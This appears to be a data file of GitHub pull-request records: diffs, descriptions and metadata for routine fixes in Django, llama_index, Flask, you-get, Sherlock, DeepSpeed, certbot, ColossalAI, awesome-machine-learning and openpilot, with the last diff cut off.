AsyncRequestFactoryTest(SimpleTestCase): @@ -1147,6 +1155,16 @@ async def async_generic_view(request): self.assertEqual(response.status_code, 200) self.assertEqual(response.content, b'{"example": "data"}') + async def test_request_limited_read(self): + tests = ["GET", "POST"] + for method in tests: + with self.subTest(method=method): + request = self.request_factory.generic( + method, + "/somewhere", + ) + self.assertEqual(request.read(200), b"") + def test_request_factory_sets_headers(self): request = self.request_factory.get( "/somewhere/", diff --git a/tests/test_client/views.py b/tests/test_client/views.py index 773e9e4e987f3..01850257b5165 100644 --- a/tests/test_client/views.py +++ b/tests/test_client/views.py @@ -90,6 +90,8 @@ def post_view(request): c = Context() else: t = Template("Viewing GET page.", name="Empty GET Template") + # Used by test_body_read_on_get_data. + request.read(200) c = Context() return HttpResponse(t.render(c))
[Trac issue](https://code.djangoproject.com/ticket/34063) We found that when `FakePayload` tries to `read` and is given a number of bytes that is larger than the available content, it hits an assert statement and fails. When we (@kevswanberg @carltongibson) compared this to the WSGI `TestClient`, we noticed that it converted its `_stream` member to a `LimitedStream`, which has a more robust `read` method. When we made this change to `asgi.py`, we found that the `test_client` tests still passed.
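To illustrate the difference in `read()` behaviour, here is a minimal stand-in, not Django's actual `FakePayload` or `LimitedStream` implementation: a strict payload whose `read(n)` asserts the bytes exist, contrasted with a limiting wrapper that caps the request.

```python
class StrictPayload:
    """Stand-in for a FakePayload-like stream: read(n) insists n bytes exist."""
    def __init__(self, data: bytes):
        self._data, self._pos = data, 0

    def read(self, size: int) -> bytes:
        assert self._pos + size <= len(self._data), "not enough bytes buffered"
        chunk = self._data[self._pos:self._pos + size]
        self._pos += size
        return chunk


class LimitingWrapper:
    """Stand-in for a LimitedStream-like wrapper: read(n) is capped at what's left."""
    def __init__(self, stream, limit: int):
        self._stream, self._remaining = stream, limit

    def read(self, size: int = -1) -> bytes:
        if size < 0 or size > self._remaining:
            size = self._remaining
        self._remaining -= size
        return self._stream.read(size)


wrapped = LimitingWrapper(StrictPayload(b""), 0)
print(wrapped.read(200))          # b'' -- no assertion, mirroring test_request_limited_read
# StrictPayload(b"").read(200)    # would trip the assertion instead
```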
https://api.github.com/repos/django/django/pulls/16210
2022-10-20T22:47:19Z
2022-11-08T12:53:34Z
2022-11-08T12:53:34Z
2022-11-08T12:53:34Z
867
django/django
50,863
grammatical fixes on chat_stores.md
diff --git a/docs/module_guides/storing/chat_stores.md b/docs/module_guides/storing/chat_stores.md index d5c67c861cc93..bc45561222dc2 100644 --- a/docs/module_guides/storing/chat_stores.md +++ b/docs/module_guides/storing/chat_stores.md @@ -1,14 +1,14 @@ # Chat Stores -A chat store serves as a centralized interface to store your chat history. Chat history is unique to other storage formats, since the order of messages is important to maintining an overall conversation. +A chat store serves as a centralized interface to store your chat history. Chat history is unique compared to other storage formats, since the order of messages is important for maintaining an overall conversation. -Chat stores can be organize sequences of chat messages by keys (like `user_ids` or other unique identifiable strings), and handle `delete`, `insert`, and `get` operations. +Chat stores can organize sequences of chat messages by keys (like `user_ids` or other unique identifiable strings), and handle `delete`, `insert`, and `get` operations. ## SimpleChatStore -The most basic chat store is `SimpleChatStore`, which stores messages in memory and saves to/from disk, or can be serlized and stored somewhere else. +The most basic chat store is `SimpleChatStore`, which stores messages in memory and can save to/from disk, or can be serialized and stored elsewhere. -Typically, you will insansiate a chat store and give it to a memory module. Memory modules that use chat stores will default to using `SimpleChatStore` if not provided. +Typically, you will instantiate a chat store and give it to a memory module. Memory modules that use chat stores will default to using `SimpleChatStore` if not provided. ```python from llama_index.core.storage.chat_store import SimpleChatStore @@ -49,7 +49,7 @@ loaded_chat_store = SimpleChatStore.parse_raw(chat_store_string) ## RedisChatStore -Using `RedisChatStore`, you can store your chat history remotely, without having to worry abouyt manually persisting and loading the chat history. +Using `RedisChatStore`, you can store your chat history remotely, without having to worry about manually persisting and loading the chat history. ```python from llama_index.storage.chat_store.redis import RedisChatStore
# Description There were grammatical errors and mistyped words in the code explanations. ## Type of Change - [x] Bug fix (non-breaking change which fixes an issue)
https://api.github.com/repos/run-llama/llama_index/pulls/12012
2024-03-17T10:58:28Z
2024-03-19T15:22:41Z
2024-03-19T15:22:41Z
2024-03-19T15:22:41Z
506
run-llama/llama_index
6,074
Cleaned "powered by" section a little.
diff --git a/flask_website/listings/projects.py b/flask_website/listings/projects.py index 04e8c54957..56ac083ffb 100644 --- a/flask_website/listings/projects.py +++ b/flask_website/listings/projects.py @@ -38,10 +38,6 @@ def to_json(self): <p> The website of the Brighton Python User Group ''', source='http://github.com/j4mie/brightonpy.org/'), - Project('vlasiku.lojban.org', 'http://vlasisku.lojban.org/', ''' - <p> - An intelligent search engine for the Lojban dictionary. - '''), Project(u's h o r e … software development', 'http://shore.be/', ''' <p>Corporate website of Shore Software Development. '''), @@ -118,7 +114,7 @@ def to_json(self): Activity stream aggregator and umbrella home page for the Nuxeo Open Source ECM project sites. ''', source='https://github.com/sfermigier/nuxeo.org'), - Project('Planete GT LL', 'http://www.gt-logiciel-libre.org/', u''' + Project('Planete GT LL', None, u''' <p> News aggregator for the open source workgroup of the Paris Region innovation cluster, Systematic. @@ -133,10 +129,6 @@ def to_json(self): <p> A collection of responsive web designs. '''), - Project('Life Short, Coding More', 'http://www.liul.net/', u''' - <p> - Personal blog. - '''), Project('Flask Feedback', 'http://feedback.flask.pocoo.org/', u''' <p> Website by the Flask project that collects feedback from @@ -146,10 +138,6 @@ def to_json(self): <p> Russian game website. '''), - Project('Python Edinburgh', 'http://www.pythonedinburgh.org/', u''' - <p> - Website of the user group for Pythonistas in Edinburgh. - '''), Project('Get Python 3', 'http://getpython3.net/', u''' <p> A website to collect feedback of Python third party @@ -223,7 +211,7 @@ def to_json(self): <p> An Online Logic Assistent Based on Coq. ''', source='http://github.com/dcolish/Cockerel'), - Project('Ryshcate', 'http://ryshcate.leafstorm.us/', ''' + Project('Ryshcate', None, ''' <p> Ryshcate is a Flask powered pastebin with sourcecode available.
https://api.github.com/repos/pallets/flask/pulls/505
2012-05-07T11:34:58Z
2012-05-07T15:08:19Z
2012-05-07T15:08:19Z
2020-11-14T05:33:46Z
599
pallets/flask
20,831
[ffmpeg] fix concat list when output dir is not pwd
diff --git a/src/you_get/processor/ffmpeg.py b/src/you_get/processor/ffmpeg.py index a8599e527e..433aff3fcc 100644 --- a/src/you_get/processor/ffmpeg.py +++ b/src/you_get/processor/ffmpeg.py @@ -26,6 +26,18 @@ def get_usable_ffmpeg(cmd): def has_ffmpeg_installed(): return FFMPEG is not None +# Given a list of segments and the output path, generates the concat +# list and returns the path to the concat list. +def generate_concat_list(files, output): + concat_list_path = output + '.txt' + concat_list_dir = os.path.dirname(concat_list_path) + with open(concat_list_path, 'w', encoding='utf-8') as concat_list: + for file in files: + if os.path.isfile(file): + relpath = os.path.relpath(file, start=concat_list_dir) + concat_list.write('file %s\n' % parameterize(relpath)) + return concat_list_path + def ffmpeg_concat_av(files, output, ext): print('Merging video parts... ', end="", flush=True) params = [FFMPEG] + LOGLEVEL @@ -52,17 +64,9 @@ def ffmpeg_convert_ts_to_mkv(files, output='output.mkv'): def ffmpeg_concat_mp4_to_mpg(files, output='output.mpg'): # Use concat demuxer on FFmpeg >= 1.1 if FFMPEG == 'ffmpeg' and (FFMPEG_VERSION[0] >= 2 or (FFMPEG_VERSION[0] == 1 and FFMPEG_VERSION[1] >= 1)): - concat_list = open(output + '.txt', 'w', encoding="utf-8") - for file in files: - if os.path.isfile(file): - concat_list.write("file %s\n" % parameterize(file)) - concat_list.close() - - params = [FFMPEG] + LOGLEVEL - params.extend(['-f', 'concat', '-safe', '-1', '-y', '-i']) - params.append(output + '.txt') - params += ['-c', 'copy', output] - + concat_list = generate_concat_list(files, output) + params = [FFMPEG] + LOGLEVEL + ['-y', '-f', 'concat', '-safe', '-1', + '-i', concat_list, '-c', 'copy', output] if subprocess.call(params) == 0: os.remove(output + '.txt') return True @@ -115,18 +119,10 @@ def ffmpeg_concat_flv_to_mp4(files, output='output.mp4'): print('Merging video parts... ', end="", flush=True) # Use concat demuxer on FFmpeg >= 1.1 if FFMPEG == 'ffmpeg' and (FFMPEG_VERSION[0] >= 2 or (FFMPEG_VERSION[0] == 1 and FFMPEG_VERSION[1] >= 1)): - concat_list = open(output + '.txt', 'w', encoding="utf-8") - for file in files: - if os.path.isfile(file): - # for escaping rules, see: - # https://www.ffmpeg.org/ffmpeg-utils.html#Quoting-and-escaping - concat_list.write("file %s\n" % parameterize(file)) - concat_list.close() - - params = [FFMPEG] + LOGLEVEL + ['-f', 'concat', '-safe', '-1', '-y', '-i'] - params.append(output + '.txt') - params += ['-c', 'copy', '-bsf:a', 'aac_adtstoasc', output] - + concat_list = generate_concat_list(files, output) + params = [FFMPEG] + LOGLEVEL + ['-y', '-f', 'concat', '-safe', '-1', + '-i', concat_list, '-c', 'copy', + '-bsf:a', 'aac_adtstoasc', output] subprocess.check_call(params) os.remove(output + '.txt') return True @@ -162,16 +158,10 @@ def ffmpeg_concat_mp4_to_mp4(files, output='output.mp4'): print('Merging video parts... 
', end="", flush=True) # Use concat demuxer on FFmpeg >= 1.1 if FFMPEG == 'ffmpeg' and (FFMPEG_VERSION[0] >= 2 or (FFMPEG_VERSION[0] == 1 and FFMPEG_VERSION[1] >= 1)): - concat_list = open(output + '.txt', 'w', encoding="utf-8") - for file in files: - if os.path.isfile(file): - concat_list.write("file %s\n" % parameterize(file)) - concat_list.close() - - params = [FFMPEG] + LOGLEVEL + ['-f', 'concat', '-safe', '-1', '-y', '-i'] - params.append(output + '.txt') - params += ['-c', 'copy', '-bsf:a', 'aac_adtstoasc', output] - + concat_list = generate_concat_list(files, output) + params = [FFMPEG] + LOGLEVEL + ['-y', '-f', 'concat', '-safe', '-1', + '-i', concat_list, '-c', 'copy', + '-bsf:a', 'aac_adtstoasc', output] subprocess.check_call(params) os.remove(output + '.txt') return True
Relative paths in the concat list are considered relative to the parent directory of the script, not the calling directory. This isn't entirely obvious from the documentation, but it is easy to infer from the concat demuxer's concept of "safety", and easy to test (confirmed on FFmpeg 3.2.2). See https://ffmpeg.org/ffmpeg-all.html#concat-1 for details. This commit fixes the wrong relative paths when `--output-dir` is specified and not pwd. This commit also - Factors out common concat list writer code; - Slightly simplifies the code to collect FFmpeg params (on Py35+ we can further simplify by unpacking `LOGLEVEL` with the star operator right in the list literal). <!-- Reviewable:start --> --- This change is [<img src="https://reviewable.io/review_button.svg" height="34" align="absmiddle" alt="Reviewable"/>](https://reviewable.io/reviews/soimort/you-get/1558) <!-- Reviewable:end -->
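A minimal sketch of the path handling (hypothetical file names; the real code also escapes each entry via `parameterize`), showing why entries must be made relative to the directory holding the concat list rather than to the calling directory:

```python
import os

def generate_concat_list(files, output):
    """Write an ffmpeg concat list next to `output`, with entries relative to it."""
    concat_list_path = output + '.txt'
    concat_list_dir = os.path.dirname(concat_list_path) or '.'
    with open(concat_list_path, 'w', encoding='utf-8') as concat_list:
        for file in files:
            relpath = os.path.relpath(file, start=concat_list_dir)
            concat_list.write("file '%s'\n" % relpath)
    return concat_list_path

# e.g. writing output into ./downloads while the segments sit in ./segments:
# generate_concat_list(['segments/part1.mp4', 'segments/part2.mp4'],
#                      'downloads/output.mp4')
# -> downloads/output.mp4.txt containing "file '../segments/part1.mp4'" etc.
```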
https://api.github.com/repos/soimort/you-get/pulls/1558
2016-12-16T04:48:47Z
2017-01-02T15:09:48Z
2017-01-02T15:09:48Z
2017-01-02T15:48:51Z
1,220
soimort/you-get
21,085
Added Enjin
diff --git a/sherlock/resources/data.json b/sherlock/resources/data.json index 1d965a1e1..708eaed1b 100644 --- a/sherlock/resources/data.json +++ b/sherlock/resources/data.json @@ -593,6 +593,14 @@ "username_claimed": "blue", "username_unclaimed": "noonewouldeverusethis7" }, + "Enjin": { + "errorMsg": "Yikes, there seems to have been an error. We've taken note and will check out the problem right away!", + "errorType": "message", + "url": "https://www.enjin.com/profile/{}", + "urlMain": "https://www.enjin.com/", + "username_claimed": "blue", + "username_unclaimed": "noonewouldeverusethis7" + }, "Envato Forum": { "errorType": "status_code", "url": "https://forums.envato.com/u/{}",
https://api.github.com/repos/sherlock-project/sherlock/pulls/1543
2022-10-11T01:18:22Z
2022-10-16T00:49:55Z
2022-10-16T00:49:55Z
2023-04-23T00:30:03Z
232
sherlock-project/sherlock
36,256
fix typo with deepspeed/
diff --git a/deepspeed/autotuning/autotuner.py b/deepspeed/autotuning/autotuner.py index 73825a69f582..4ea71d317f2b 100755 --- a/deepspeed/autotuning/autotuner.py +++ b/deepspeed/autotuning/autotuner.py @@ -637,7 +637,7 @@ def tune_space(self, tuning_space, prev_max_mbs=0, prev_best_mbs=0, prev_best_me logger.info(f"End tuning for space: {tuning_space_name}") return max_micro_batch_size, best_mbs, best_metric_val - def get_plauteu_mbs(self, tuning_space_name): + def get_plateau_mbs(self, tuning_space_name): if tuning_space_name not in self.records: return 0 space_records = self.records[tuning_space_name] diff --git a/deepspeed/compression/compress.py b/deepspeed/compression/compress.py index 951ef1bb2da1..2f0e88beee21 100644 --- a/deepspeed/compression/compress.py +++ b/deepspeed/compression/compress.py @@ -213,14 +213,14 @@ def student_initialization(student_model, teacher_model, deepspeed_config): Example 1: bert.encoder.layer, for BERT_base model's prefix name Example 2: transformer.h, for GPT-2 hugging face prefix name teacher_layer (`list of integers`) - The layer of teacher will be used for student's reinitializedion + The layer of teacher will be used for student's reinitialization Example 1: [1,3,5,7,9], means we want to matches the 2nd/4th/6th/8th/10th layer of teacher to the first 5 layers of student student_layer (`list` or None) The layer of student need to be re-initialized Example 1: None, means we want to reinitialize all the layers Example 1: [0,1,2,3,4], means we want to reinitialize the first 5 layers other_module_name (`list of string`) - The modules will be used for student's reinitializedion + The modules will be used for student's reinitialization Example 1: ['bert.pooler', 'bert.embeddings', 'classifier'], means we want to apply the weight in teacher's embedding/pooler/classier module to the student Example 2: ['transformer.w', 'transformer.ln_f', 'lm_head'], means we want to apply the weight in teacher's embedding layers module to the student Note that teacher_layer should matches student layer diff --git a/deepspeed/nebula/constants.py b/deepspeed/nebula/constants.py index 2bfcef775145..9fa5769b5597 100644 --- a/deepspeed/nebula/constants.py +++ b/deepspeed/nebula/constants.py @@ -29,8 +29,8 @@ # There is a case where customer want to load the checkpoint saved # by raw torch. Because nebula cannot load torch checkpoint directly # as they have different folder structures to bring the gap for -# loading(the data are totally same in bytes for torch and nebula s -# aving). +# loading(the data are totally same in bytes for torch and nebula +# saving). # In this case, we must disable nebula load to use raw torch load. # Customer can just set NEBULA_ENABLE_NEBULA_LOAD to False. Then use # original way of deepspeed to load, i.e. set the value of "--load". diff --git a/deepspeed/runtime/checkpoint_engine/README.md b/deepspeed/runtime/checkpoint_engine/README.md index a19f54889802..c2b7940a414a 100644 --- a/deepspeed/runtime/checkpoint_engine/README.md +++ b/deepspeed/runtime/checkpoint_engine/README.md @@ -31,7 +31,7 @@ class CheckpointEngine(object): pass def commit(self, tag): - # to tell checkpoint services if all files are readys. + # to tell checkpoint services if all files are ready. 
pass ``` diff --git a/deepspeed/runtime/checkpoint_engine/checkpoint_engine.py b/deepspeed/runtime/checkpoint_engine/checkpoint_engine.py index 3f8978df0316..a341dffdf692 100644 --- a/deepspeed/runtime/checkpoint_engine/checkpoint_engine.py +++ b/deepspeed/runtime/checkpoint_engine/checkpoint_engine.py @@ -26,5 +26,5 @@ def load(self, path: str, map_location=None): pass def commit(self, tag): - # to tell checkpoint services if all files are readys. + # to tell checkpoint services if all files are ready. pass diff --git a/deepspeed/runtime/engine.py b/deepspeed/runtime/engine.py index 93ab0bdefc91..b638969755df 100644 --- a/deepspeed/runtime/engine.py +++ b/deepspeed/runtime/engine.py @@ -1916,7 +1916,7 @@ def set_gradient_accumulation_boundary(self, is_boundary): """ Manually overrides the DeepSpeed engine's gradient accumulation boundary state, this is an optional feature and should be used with care. The state should be set before to the intended - value before each forward/backward. The final fordward/backward should have the + value before each forward/backward. The final forward/backward should have the boundary state set to True. This style allows client code to only call engine.step() once after all the gradient accumulation passes are complete. See example below: .. code-block:: python
Fix typos under `deepspeed/`. Files modified: deepspeed/autotuning/autotuner.py, deepspeed/compression/compress.py, deepspeed/nebula/constants.py, deepspeed/runtime/checkpoint_engine/README.md, deepspeed/runtime/checkpoint_engine/checkpoint_engine.py, deepspeed/runtime/engine.py. @microsoft-github-policy-service agree
https://api.github.com/repos/microsoft/DeepSpeed/pulls/3547
2023-05-16T01:03:03Z
2023-06-02T00:47:14Z
2023-06-02T00:47:14Z
2023-06-02T00:53:50Z
1,282
microsoft/DeepSpeed
10,713
Reduce build log verbosity on Travis
diff --git a/.travis.yml b/.travis.yml index 2b8eafc1396..89885d08e7b 100644 --- a/.travis.yml +++ b/.travis.yml @@ -9,6 +9,7 @@ before_install: before_script: - 'if [ $TRAVIS_OS_NAME = osx ] ; then ulimit -n 1024 ; fi' + - export TOX_TESTENV_PASSENV=TRAVIS matrix: include: diff --git a/appveyor.yml b/appveyor.yml index ce2b5998ce3..2b6b82747a6 100644 --- a/appveyor.yml +++ b/appveyor.yml @@ -24,6 +24,7 @@ install: build: off test_script: + - set TOX_TESTENV_PASSENV=APPVEYOR # Test env is set by TOXENV env variable - tox diff --git a/tools/pip_install.py b/tools/pip_install.py index 354dce32b4c..4466729e03a 100755 --- a/tools/pip_install.py +++ b/tools/pip_install.py @@ -71,6 +71,11 @@ def main(args): tools_path = find_tools_path() working_dir = tempfile.mkdtemp() + if os.environ.get('TRAVIS'): + # When this script is executed on Travis, the following print will make the log + # be folded until the end command is printed (see finally section). + print('travis_fold:start:install_certbot_deps') + try: test_constraints = os.path.join(working_dir, 'test_constraints.txt') all_constraints = os.path.join(working_dir, 'all_constraints.txt') @@ -89,6 +94,8 @@ def main(args): call_with_print('"{0}" -m pip install --constraint "{1}" {2}' .format(sys.executable, all_constraints, ' '.join(args))) finally: + if os.environ.get('TRAVIS'): + print('travis_fold:end:install_certbot_deps') shutil.rmtree(working_dir) diff --git a/tox.ini b/tox.ini index 021c2394942..71491c34afc 100644 --- a/tox.ini +++ b/tox.ini @@ -64,9 +64,6 @@ source_paths = tests/lock_test.py [testenv] -passenv = - TRAVIS - APPVEYOR commands = {[base]install_and_test} {[base]all_packages} python tests/lock_test.py @@ -176,7 +173,6 @@ whitelist_externals = docker passenv = DOCKER_* - TRAVIS [testenv:nginx_compat] commands = @@ -187,7 +183,6 @@ whitelist_externals = docker passenv = DOCKER_* - TRAVIS [testenv:le_auto_precise] # At the moment, this tests under Python 2.7 only, as only that version is @@ -199,7 +194,6 @@ whitelist_externals = docker passenv = DOCKER_* - TRAVIS [testenv:le_auto_trusty] # At the moment, this tests under Python 2.7 only, as only that version is @@ -212,7 +206,6 @@ whitelist_externals = docker passenv = DOCKER_* - TRAVIS TRAVIS_BRANCH [testenv:le_auto_wheezy]
PR #6568 removed the `--quiet` option in pip invocations, because this option deletes a lot of extremely useful logs when something goes wrong. However, when everything goes right, or at least when pip install executes correctly, these logs add hundreds of lines that are only noise, making it hard to debug errors that may sit in only one or two lines. We can have the best of both worlds. Travis allows folding large blocks of logs, which can be expanded directly from the UI if needed. It only requires printing specific marker codes to the console, which this PR implements in the `pip_install.py` script when the build runs on Travis (detected by the existence of the `TRAVIS` environment variable). I also took the opportunity to clean up `tox.ini` a little. Note that AppVeyor does not have this fold capability, but it can be emulated by properly capturing stdout/stderr and emitting it only when an error is detected.
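The folding itself is just a pair of magic marker strings printed around the noisy block; a minimal sketch with a hypothetical fold name:

```python
import contextlib
import os

@contextlib.contextmanager
def travis_fold(name):
    """Fold everything printed inside this block in the Travis CI web log."""
    folding = bool(os.environ.get('TRAVIS'))
    if folding:
        print('travis_fold:start:{0}'.format(name))
    try:
        yield
    finally:
        if folding:
            print('travis_fold:end:{0}'.format(name))

# with travis_fold('install_certbot_deps'):
#     run_noisy_pip_install()
```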
https://api.github.com/repos/certbot/certbot/pulls/6597
2018-12-11T23:37:38Z
2019-01-09T04:45:17Z
2019-01-09T04:45:17Z
2019-01-09T16:24:59Z
789
certbot/certbot
420
[doc] update open-sora demo
diff --git a/README.md b/README.md index 2f6aa60678ef..7c234b15e75e 100644 --- a/README.md +++ b/README.md @@ -133,14 +133,13 @@ distributed training and inference in a few lines. [[HuggingFace model weights]](https://huggingface.co/hpcai-tech/Open-Sora) [[Demo]](https://github.com/hpcaitech/Open-Sora?tab=readme-ov-file#-latest-demo) -<p id="diffusion_demo" align="center"> -<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/applications/sora/open-sora-1.png" width=600/> -</p> - -<p id="diffusion_demo" align="center"> -<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/applications/sora/open-sora-2.png" width=600/> -</p> +<div align="center"> + <a href="https://www.youtube.com/watch?v=iDTxepqixuc"> + <img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/applications/sora/sora-demo.png" width="700" /> + </a> +</div> +<p align="right">(<a href="#top">back to top</a>)</p> ### Colossal-LLaMA-2 diff --git a/applications/README.md b/applications/README.md index 8abe1e52d96c..120767d5c9ea 100644 --- a/applications/README.md +++ b/applications/README.md @@ -4,7 +4,7 @@ This directory contains the applications that are powered by Colossal-AI. The list of applications include: -- [X] [Open-Sora](https://github.com/hpcaitech/Open-Sora): Sora Replication Solution with 46% Cost Reduction, Sequence Expansion to Nearly a Million +- [X] [Open-Sora](https://github.com/hpcaitech/Open-Sora): Revealing Complete Model Parameters, Training Details, and Everything for Sora-like Video Generation Models - [X] [Colossal-LLaMA-2](./Colossal-LLaMA-2/): Continual Pre-training of LLaMA-2. - [X] [ColossalEval](./ColossalEval): Evaluation Pipeline for LLMs. - [X] [ColossalChat](./Chat/README.md): Replication of ChatGPT with RLHF. diff --git a/docs/README-zh-Hans.md b/docs/README-zh-Hans.md index 7d267b16f442..93045ea6adc6 100644 --- a/docs/README-zh-Hans.md +++ b/docs/README-zh-Hans.md @@ -128,13 +128,11 @@ Colossal-AI 为您提供了一系列并行组件。我们的目标是让您的 [[模型权重]](https://huggingface.co/hpcai-tech/Open-Sora) [[演示样例]](https://github.com/hpcaitech/Open-Sora?tab=readme-ov-file#-latest-demo) -<p id="diffusion_demo" align="center"> -<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/applications/sora/open-sora-1.png" width=600/> -</p> - -<p id="diffusion_demo" align="center"> -<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/applications/sora/open-sora-2.png" width=600/> -</p> +<div align="center"> + <a href="https://www.bilibili.com/video/BV1dW421c7MN"> + <img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/applications/sora/sora-demo-cn.png" width="700" /> + </a> +</div> ### Colossal-LLaMA-2
## 📌 Checklist before creating the PR - [ ] I have created an issue for this PR for traceability - [ ] The title follows the standard format: `[doc/gemini/tensor/...]: A concise description` - [ ] I have added relevant tags if possible for us to better distinguish different PRs ## 🚨 Issue number > Link this PR to your issue with words like fixed to automatically close the linked issue upon merge > > e.g. `fixed #1234`, `closed #1234`, `resolved #1234` ## 📝 What does this PR do? > Summarize your work here. > if you have any plots/diagrams/screenshots/tables, please attach them here. ## 💥 Checklist before requesting a review - [ ] I have linked my PR to an issue ([instruction](https://docs.github.com/en/issues/tracking-your-work-with-issues/linking-a-pull-request-to-an-issue)) - [ ] My issue clearly describes the problem/feature/proposal, with diagrams/charts/table/code if possible - [ ] I have performed a self-review of my code - [ ] I have added thorough tests. - [ ] I have added docstrings for all the functions/methods I implemented ## ⭐️ Do you enjoy contributing to Colossal-AI? - [ ] 🌝 Yes, I do. - [ ] 🌚 No, I don't. Tell us more if you don't enjoy contributing to Colossal-AI.
https://api.github.com/repos/hpcaitech/ColossalAI/pulls/5479
2024-03-20T08:07:33Z
2024-03-20T08:08:41Z
2024-03-20T08:08:41Z
2024-03-20T08:09:44Z
888
hpcaitech/ColossalAI
10,998
Fixed Import Error
diff --git a/libs/langchain/langchain/vectorstores/weaviate.py b/libs/langchain/langchain/vectorstores/weaviate.py index 200ffedc6ef91d..3f965212241df1 100644 --- a/libs/langchain/langchain/vectorstores/weaviate.py +++ b/libs/langchain/langchain/vectorstores/weaviate.py @@ -99,7 +99,7 @@ def __init__( try: import weaviate except ImportError: - raise ValueError( + raise ImportError( "Could not import weaviate python package. " "Please install it with `pip install weaviate-client`." )
I have restructured the code to ensure uniform handling of ImportError. In place of the previously used ValueError, I've adopted the standard practice of raising ImportError with an explanatory message. This modification enhances code readability and clarifies that any problem stems from module importation. @baskaryan, @eyurtsev, @rlancemartin.
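The pattern in question, shown standalone (taken from the diff; the package name is just this particular case):

```python
try:
    import weaviate  # optional dependency
except ImportError:
    # Raising ImportError (rather than ValueError) tells callers the failure
    # is about a missing package, and `pip install weaviate-client` fixes it.
    raise ImportError(
        "Could not import weaviate python package. "
        "Please install it with `pip install weaviate-client`."
    )
```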
https://api.github.com/repos/langchain-ai/langchain/pulls/10167
2023-09-04T07:26:06Z
2023-09-04T07:32:09Z
2023-09-04T07:32:09Z
2023-09-04T07:32:09Z
145
langchain-ai/langchain
43,521
Added new python library Neuron
diff --git a/README.md b/README.md index 8353b0e0..6697f855 100644 --- a/README.md +++ b/README.md @@ -893,6 +893,7 @@ on MNIST digits[DEEP LEARNING] <a name="python-neural networks"/> #### Neural networks * [Neural networks](https://github.com/karpathy/neuraltalk) - NeuralTalk is a Python+numpy project for learning Multimodal Recurrent Neural Networks that describe images with sentences. +* [Neuron](https://github.com/molcik/Neuron) - Neuron is simple class for time series predictions. It's utilize LNU (Linear Neural Unit), QNU (Quadratic Neural Unit), RBF (Radial Basis Function), MLP (Multi Layer Perceptron), MLP-ELM (Multi Layer Perceptron - Extreme Learning Machine) neural networks learned with Gradient descent or LeLevenberg–Marquardt algorithm. <a name="python-kaggle" />
Added new python library Neuron for time series predictions
https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/307
2016-09-01T06:52:54Z
2016-09-01T14:37:46Z
2016-09-01T14:37:46Z
2016-09-01T14:37:50Z
224
josephmisiti/awesome-machine-learning
51,959
Chrysler: fix LKAS fault for 2017 Pacifica
diff --git a/selfdrive/car/chrysler/carcontroller.py b/selfdrive/car/chrysler/carcontroller.py index 5a2d90c64c2410..879da8812376ad 100644 --- a/selfdrive/car/chrysler/carcontroller.py +++ b/selfdrive/car/chrysler/carcontroller.py @@ -2,7 +2,7 @@ from common.realtime import DT_CTRL from selfdrive.car import apply_toyota_steer_torque_limits from selfdrive.car.chrysler.chryslercan import create_lkas_hud, create_lkas_command, create_cruise_buttons -from selfdrive.car.chrysler.values import CAR, RAM_CARS, CarControllerParams +from selfdrive.car.chrysler.values import RAM_CARS, CarControllerParams, ChryslerFlags class CarController: @@ -51,7 +51,7 @@ def update(self, CC, CS): lkas_control_bit = self.lkas_control_bit_prev if CS.out.vEgo > self.CP.minSteerSpeed: lkas_control_bit = True - elif self.CP.carFingerprint in (CAR.PACIFICA_2019_HYBRID, CAR.PACIFICA_2020, CAR.JEEP_CHEROKEE_2019): + elif self.CP.flags & ChryslerFlags.HIGHER_MIN_STEERING_SPEED: if CS.out.vEgo < (self.CP.minSteerSpeed - 3.0): lkas_control_bit = False elif self.CP.carFingerprint in RAM_CARS: diff --git a/selfdrive/car/chrysler/interface.py b/selfdrive/car/chrysler/interface.py index 5e8fe3c44ef9a8..2f058165ac96e0 100755 --- a/selfdrive/car/chrysler/interface.py +++ b/selfdrive/car/chrysler/interface.py @@ -2,7 +2,7 @@ from cereal import car from panda import Panda from selfdrive.car import STD_CARGO_KG, get_safety_config -from selfdrive.car.chrysler.values import CAR, DBC, RAM_HD, RAM_DT +from selfdrive.car.chrysler.values import CAR, DBC, RAM_HD, RAM_DT, RAM_CARS, ChryslerFlags from selfdrive.car.interfaces import CarInterfaceBase @@ -24,9 +24,12 @@ def _get_params(ret, candidate, fingerprint, car_fw, experimental_long): ret.safetyConfigs[0].safetyParam |= Panda.FLAG_CHRYSLER_RAM_DT ret.minSteerSpeed = 3.8 # m/s - if candidate in (CAR.PACIFICA_2019_HYBRID, CAR.PACIFICA_2020, CAR.JEEP_CHEROKEE_2019): - # TODO: allow 2019 cars to steer down to 13 m/s if already engaged. - ret.minSteerSpeed = 17.5 # m/s 17 on the way up, 13 on the way down once engaged. + if candidate not in RAM_CARS: + # Newer FW versions standard on the following platforms, or flashed by a dealer onto older platforms have a higher minimum steering speed. + new_eps_platform = candidate in (CAR.PACIFICA_2019_HYBRID, CAR.PACIFICA_2020, CAR.JEEP_CHEROKEE_2019) + new_eps_firmware = any(fw.ecu == 'eps' and fw.fwVersion[:4] >= b"6841" for fw in car_fw) + if new_eps_platform or new_eps_firmware: + ret.flags |= ChryslerFlags.HIGHER_MIN_STEERING_SPEED.value # Chrysler if candidate in (CAR.PACIFICA_2017_HYBRID, CAR.PACIFICA_2018, CAR.PACIFICA_2018_HYBRID, CAR.PACIFICA_2019_HYBRID, CAR.PACIFICA_2020): @@ -55,10 +58,9 @@ def _get_params(ret, candidate, fingerprint, car_fw, experimental_long): ret.mass = 2493. + STD_CARGO_KG CarInterfaceBase.configure_torque_tune(candidate, ret.lateralTuning) ret.minSteerSpeed = 14.5 - if car_fw is not None: - for fw in car_fw: - if fw.ecu == 'eps' and fw.fwVersion[:8] in (b"68312176", b"68273275"): - ret.minSteerSpeed = 0. + for fw in car_fw: + if fw.ecu == 'eps' and fw.fwVersion.startswith((b"68312176", b"68273275")): + ret.minSteerSpeed = 0. elif candidate == CAR.RAM_HD: ret.steerActuatorDelay = 0.2 @@ -71,6 +73,10 @@ def _get_params(ret, candidate, fingerprint, car_fw, experimental_long): else: raise ValueError(f"Unsupported car: {candidate}") + if ret.flags & ChryslerFlags.HIGHER_MIN_STEERING_SPEED: + # TODO: allow these cars to steer down to 13 m/s if already engaged. 
